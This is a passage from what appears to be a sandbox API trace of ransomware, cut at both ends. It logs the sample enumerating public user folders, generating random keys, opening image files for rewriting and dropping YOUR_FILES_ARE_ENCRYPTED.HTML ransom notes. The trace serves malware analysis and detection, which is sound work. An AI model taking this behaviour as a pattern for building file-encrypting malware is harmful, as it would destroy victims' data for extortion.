lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d07da2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d07da2, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x8907c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Lighthouse.jpg", cAlternateFileName="LIGHTH~1.JPG")) returned 1 [0171.669] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 59 [0171.669] lstrcmpW (lpString1="Lighthouse.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.669] PathFindExtensionW (pszPath="Lighthouse.jpg") returned=".jpg" [0171.669] lstrlenW (lpString=".jpg") returned 4 [0171.669] PathFindExtensionW (pszPath="Lighthouse.jpg") returned=".jpg" [0171.669] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0171.671] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=561276) returned 1 [0171.671] GetProcessHeap () returned 0x270000 [0171.671] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77091a8 [0171.673] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="52") returned 2 [0171.673] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="AF") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="33") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="AB") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="5E") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="E5") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="35") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="F6") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="66") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="7D") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="9E") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="FC") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="95") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="C8") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="95") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="99") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="2C") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="59") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="60") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="3A") returned 2 [0171.674] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="9F") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="5D") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="C5") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="67") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="6D") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="09") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="B0") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="2C") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="6E") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="38") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="1F") returned 2 [0171.675] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="12") returned 2 [0171.675] lstrcpyW (in: lpString1=0x771925c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" [0171.676] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x77091a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.676] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77091a8, lpOverlapped=0x77091a8) returned 1 [0171.676] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1ce1c42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1ce1c42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xbde6b, dwReserved0=0x0, dwReserved1=0x60, cFileName="Penguins.jpg", cAlternateFileName="")) returned 1 [0171.676] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 57 [0171.676] lstrcmpW (lpString1="Penguins.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.676] PathFindExtensionW (pszPath="Penguins.jpg") returned=".jpg" [0171.676] lstrlenW (lpString=".jpg") returned 4 [0171.676] PathFindExtensionW (pszPath="Penguins.jpg") returned=".jpg" [0171.676] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d8 [0171.677] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=777835) returned 1 [0171.677] GetProcessHeap () returned 0x270000 [0171.677] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x750a450 [0171.681] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="89") returned 2 [0171.681] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="24") returned 2 [0171.681] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="0E") returned 2 [0171.681] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="EF") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="8F") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="03") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="E2") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="6B") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="ED") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="2D") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="A0") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="2C") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="CE") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="C6") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="B5") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="8F") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="29") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="53") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="A6") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="A2") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="1B") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="72") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="1B") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="40") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="C7") returned 2 [0171.682] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="EF") returned 2 [0171.683] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="B9") returned 2 [0171.683] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="A8") returned 2 [0171.683] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="4F") returned 2 [0171.683] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="67") returned 2 [0171.683] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="CD") returned 2 [0171.683] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="21") returned 2 [0171.683] lstrcpyW (in: lpString1=0x751a504, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" [0171.683] CreateIoCompletionPort (FileHandle=0x5d8, ExistingCompletionPort=0x3a0, CompletionKey=0x750a450, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.683] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x750a450, lpOverlapped=0x750a450) returned 1 [0171.683] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d07da2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d07da2, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0x0, dwReserved1=0x60, cFileName="Tulips.jpg", cAlternateFileName="")) returned 1 [0171.683] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0171.684] lstrcmpW (lpString1="Tulips.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.684] PathFindExtensionW (pszPath="Tulips.jpg") returned=".jpg" [0171.684] lstrlenW (lpString=".jpg") returned 4 [0171.684] PathFindExtensionW (pszPath="Tulips.jpg") returned=".jpg" [0171.684] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5f0 [0171.684] GetFileSizeEx (in: hFile=0x5f0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=620888) returned 1 [0171.684] GetProcessHeap () returned 0x270000 [0171.684] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75325a8 [0171.686] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="79") returned 2 [0171.686] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="98") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="BE") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="5A") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="C3") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D5") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="03") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="0D") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="4C") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="DA") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="6E") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="04") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="EF") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="4E") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="DC") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="32") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="FF") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="2D") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="E7") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="5F") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="5D") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="F1") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="62") returned 2 [0171.687] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="86") returned 2 [0171.688] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="E8") returned 2 [0171.688] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="A4") returned 2 [0171.688] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="64") returned 2 [0171.688] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="75") returned 2 [0171.688] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="B0") returned 2 [0171.688] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="0C") returned 2 [0171.688] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="D3") returned 2 [0171.688] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="2B") returned 2 [0171.688] lstrcpyW (in: lpString1=0x754265c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" [0171.688] CreateIoCompletionPort (FileHandle=0x5f0, ExistingCompletionPort=0x3a0, CompletionKey=0x75325a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.688] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75325a8, lpOverlapped=0x75325a8) returned 1 [0171.689] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d07da2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d07da2, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0x0, dwReserved1=0x60, cFileName="Tulips.jpg", cAlternateFileName="")) returned 0 [0171.689] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.689] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0171.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\pictures\\sample pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.839] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.841] CloseHandle (hObject=0x5f8) returned 1 [0171.841] GetProcessHeap () returned 0x270000 [0171.842] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.842] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3d7eb8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0171.843] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.843] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 58 [0171.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.843] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.845] CloseHandle (hObject=0x5a0) returned 1 [0171.845] GetProcessHeap () returned 0x270000 [0171.846] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0171.846] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0171.846] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV") returned 31 [0171.846] GetProcessHeap () returned 0x270000 [0171.846] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0171.847] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV") returned="\\\\?\\C:\\Users\\Public\\Recorded TV" [0171.847] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\*") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\*" [0171.847] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.847] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.847] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xbbbe3c8e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xbbbe3c8e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.847] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini") returned 43 [0171.847] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.847] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.847] lstrlenW (lpString=".ini") returned 4 [0171.847] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.847] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 1 [0171.848] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media") returned 44 [0171.848] GetProcessHeap () returned 0x270000 [0171.848] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.848] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media" [0171.848] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*" [0171.848] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.848] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.848] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xbc330fc8, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xbc330fc8, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0xab, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.848] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini") returned 56 [0171.848] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.848] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.848] lstrlenW (lpString=".ini") returned 4 [0171.849] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.849] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc371f54c, 